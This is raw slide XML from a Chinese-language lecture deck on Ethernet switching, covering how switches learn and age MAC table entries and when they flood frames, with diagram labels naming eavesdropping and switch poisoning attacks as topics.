            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>帧目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>广播地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>即：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FF-FF-FF-FF-FF-FF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>帧目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>交换机表中查不到对应的表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>项</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22534" name="Freeform 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6732588" y="3141663"/>
            <a:ext cx="674687" cy="674687"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 673994"/>
              <a:gd name="T1" fmla="*/ 374526 h 673994"/>
              <a:gd name="T2" fmla="*/ 153216 w 673994"/>
              <a:gd name="T3" fmla="*/ 374526 h 673994"/>
              <a:gd name="T4" fmla="*/ 153216 w 673994"/>
              <a:gd name="T5" fmla="*/ 0 h 673994"/>
              <a:gd name="T6" fmla="*/ 527745 w 673994"/>
              <a:gd name="T7" fmla="*/ 0 h 673994"/>
              <a:gd name="T8" fmla="*/ 527745 w 673994"/>
              <a:gd name="T9" fmla="*/ 374526 h 673994"/>
              <a:gd name="T10" fmla="*/ 680962 w 673994"/>
              <a:gd name="T11" fmla="*/ 374526 h 673994"/>
              <a:gd name="T12" fmla="*/ 340481 w 673994"/>
              <a:gd name="T13" fmla="*/ 680956 h 673994"/>
              <a:gd name="T14" fmla="*/ 0 w 673994"/>
              <a:gd name="T15" fmla="*/ 374526 h 673994"/>
              <a:gd name="T16" fmla="*/ 0 60000 65536"/>
              <a:gd name="T17" fmla="*/ 0 60000 65536"/>
              <a:gd name="T18" fmla="*/ 0 60000 65536"/>
              <a:gd name="T19" fmla="*/ 0 60000 65536"/>
              <a:gd name="T20" fmla="*/ 0 60000 65536"/>
              <a:gd name="T21" fmla="*/ 0 60000 65536"/>
              <a:gd name="T22" fmla="*/ 0 60000 65536"/>
              <a:gd name="T23" fmla="*/ 0 60000 65536"/>
              <a:gd name="T24" fmla="*/ 0 w 673994"/>
              <a:gd name="T25" fmla="*/ 0 h 673994"/>
              <a:gd name="T26" fmla="*/ 673994 w 673994"/>
              <a:gd name="T27" fmla="*/ 673994 h 6739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3994" h="673994">
                <a:moveTo>
                  <a:pt x="0" y="370697"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="151649" y="370697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151649" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522345" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522345" y="370697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="673994" y="370697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336997" y="673994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="370697"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="CCDFE8"/>
          </a:solidFill>
          <a:ln w="55000" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="CCDFE8"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="182129" tIns="30480" rIns="182129" bIns="197294" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10248" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6804025" y="2276475"/>
            <a:ext cx="12954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latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22537" name="Freeform 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2229557" y="5614318"/>
            <a:ext cx="1295400" cy="1295400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1296144"/>
              <a:gd name="T1" fmla="*/ 644361 h 1296144"/>
              <a:gd name="T2" fmla="*/ 188729 w 1296144"/>
              <a:gd name="T3" fmla="*/ 188728 h 1296144"/>
              <a:gd name="T4" fmla="*/ 644363 w 1296144"/>
              <a:gd name="T5" fmla="*/ 1 h 1296144"/>
              <a:gd name="T6" fmla="*/ 1099996 w 1296144"/>
              <a:gd name="T7" fmla="*/ 188730 h 1296144"/>
              <a:gd name="T8" fmla="*/ 1288724 w 1296144"/>
              <a:gd name="T9" fmla="*/ 644364 h 1296144"/>
              <a:gd name="T10" fmla="*/ 1099995 w 1296144"/>
              <a:gd name="T11" fmla="*/ 1099997 h 1296144"/>
              <a:gd name="T12" fmla="*/ 644362 w 1296144"/>
              <a:gd name="T13" fmla="*/ 1288726 h 1296144"/>
              <a:gd name="T14" fmla="*/ 188729 w 1296144"/>
              <a:gd name="T15" fmla="*/ 1099997 h 1296144"/>
              <a:gd name="T16" fmla="*/ 2 w 1296144"/>
              <a:gd name="T17" fmla="*/ 644364 h 1296144"/>
              <a:gd name="T18" fmla="*/ 0 w 1296144"/>
              <a:gd name="T19" fmla="*/ 644361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3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>窃听</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Freeform 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5197483" y="5577533"/>
            <a:ext cx="1295400" cy="1295400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1296144"/>
              <a:gd name="T1" fmla="*/ 644361 h 1296144"/>
              <a:gd name="T2" fmla="*/ 188729 w 1296144"/>
              <a:gd name="T3" fmla="*/ 188728 h 1296144"/>
              <a:gd name="T4" fmla="*/ 644363 w 1296144"/>
              <a:gd name="T5" fmla="*/ 1 h 1296144"/>
              <a:gd name="T6" fmla="*/ 1099996 w 1296144"/>
              <a:gd name="T7" fmla="*/ 188730 h 1296144"/>
              <a:gd name="T8" fmla="*/ 1288724 w 1296144"/>
              <a:gd name="T9" fmla="*/ 644364 h 1296144"/>
              <a:gd name="T10" fmla="*/ 1099995 w 1296144"/>
              <a:gd name="T11" fmla="*/ 1099997 h 1296144"/>
              <a:gd name="T12" fmla="*/ 644362 w 1296144"/>
              <a:gd name="T13" fmla="*/ 1288726 h 1296144"/>
              <a:gd name="T14" fmla="*/ 188729 w 1296144"/>
              <a:gd name="T15" fmla="*/ 1099997 h 1296144"/>
              <a:gd name="T16" fmla="*/ 2 w 1296144"/>
              <a:gd name="T17" fmla="*/ 644364 h 1296144"/>
              <a:gd name="T18" fmla="*/ 0 w 1296144"/>
              <a:gd name="T19" fmla="*/ 644361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000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>交换机毒化攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1042988" y="1268413"/>
            <a:ext cx="7273925" cy="757237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>以太网采用星型拓扑结构，使用集线器（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>hub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>）或者交换机（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>switch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>）连接网络节点。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="直接连接符 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116013" y="1989138"/>
            <a:ext cx="2160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 calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22532"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22532"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22532"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22532"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22532"/>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2534"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22534"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22534"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22534"/>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12" presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="22533"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22533"/>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22537"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22537"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2253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animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="22533" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="22534" grpId="0" animBg="1"/>
      <p:bldP spid="22537" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="10" grpId="0" bldLvl="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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>交换机内部保存一个交换表：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>(MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>接口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>, TTL)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>过期表项将被删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TTL=60</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>分钟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>交换机自学习</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>当接收一数据帧时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>交换机学习并记录发送者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>位置对应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>关系：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>即数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>帧</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
